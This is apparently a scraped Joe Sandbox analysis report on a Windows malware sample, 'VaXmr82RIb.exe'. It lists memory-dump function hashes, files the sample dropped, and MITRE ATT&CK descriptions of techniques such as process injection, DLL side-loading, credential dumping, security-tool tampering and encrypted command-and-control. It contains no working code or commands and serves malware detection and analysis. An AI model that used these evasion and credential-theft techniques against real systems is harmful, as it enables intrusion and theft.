Instruction ID: cd81d49043a190e143394f7cff56b7a86e311392cb292caa6958f9793968b82f
Opcode Fuzzy Hash: a8481141e2832ef6612658138b78611bdfbe1370b2140b334f541689e648b4e2
Instruction Fuzzy Hash: 6AC09BA6F5463117CAD6A578305014C63516B59570342515DD405DB340D51D5D0513C5

Function 034ACE2C Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beba05ff5886629ca6e95c82e805439c47da828b55926b8a23819c175712ca4c
Instruction ID: ad6f0afe0b1e022625f9dd7ba01001dcadc0ee364dfcffc266875b474d92b146
Opcode Fuzzy Hash: beba05ff5886629ca6e95c82e805439c47da828b55926b8a23819c175712ca4c
Instruction Fuzzy Hash: D7C00238254500CFC744CB58E588C54B3A5FF4872535A85DAE40DCBB72C771EC55CA45

Function 034ACE30 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a5012bc9718f41ecddf22eb8e65365f364c913bce36dff3da9bcc525ad1969
Instruction ID: 88eb40e917cdf194bf7601680b3d9cf14a6c7b673e4117d6b638cbe01be8d999
Opcode Fuzzy Hash: 73a5012bc9718f41ecddf22eb8e65365f364c913bce36dff3da9bcc525ad1969
Instruction Fuzzy Hash: ABC002342642048F8344DB59D488C11B3E9FF48A2435680D5E9098B732C631FC00CA44

Function 03622710 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a6bd6c65f2431ed1205bdba72e92dc636918d3a0c0325271a71b29a6fc4146
Instruction ID: 4611d8690d81637ca434566ff41349679680d1bb19b22439dcf4b371f46e7ee5
Opcode Fuzzy Hash: d9a6bd6c65f2431ed1205bdba72e92dc636918d3a0c0325271a71b29a6fc4146
Instruction Fuzzy Hash: B4B092A4754248478A182AEE205942B77CEA7887D0B104428A44E8B3CADDA1A801419A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VaXmr82RIb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VaXmr82RIb.exe_1a9683306ea2827b2085839add5dd3a548da7d92_deb3b68b_34961951-19ca-473f-9ff2-2ee286841b52\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BB8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CF1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D11.tmp.xml

C:\Users\user\AppData\Local\Temp\shmb2z2y.tfi

C:\Users\user\AppData\Local\Temp\tmp793B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp793C.tmp.tmpdb

C:\Users\user\AppData\Local\Temp\tmp795D.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp795E.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp795F.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7960.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7980.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7981.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7982.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7983.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7984.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat

C:\Users\user\AppData\Local\Temp\zc4g3vos.e4p

Static File Info

Windows Analysis Report
VaXmr82RIb.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre